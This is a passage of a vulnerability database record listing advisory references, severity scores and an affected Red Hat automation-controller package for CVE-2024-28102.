url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1065688
11
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2268758
reference_id 2268758
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2268758
12
reference_url https://github.com/advisories/GHSA-j857-7rvv-vj97
reference_id GHSA-j857-7rvv-vj97
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-j857-7rvv-vj97
13
reference_url https://access.redhat.com/errata/RHSA-2024:2559
reference_id RHSA-2024:2559
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:2559
14
reference_url https://access.redhat.com/errata/RHSA-2024:4522
reference_id RHSA-2024:4522
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:4522
fixed_packages
aliases CVE-2024-28102, GHSA-j857-7rvv-vj97
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ygj7-qwt8-sud5
Fixing_vulnerabilities
Risk_score3.1
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:rpm/redhat/automation-controller@4.5.8-1%3Farch=el9ap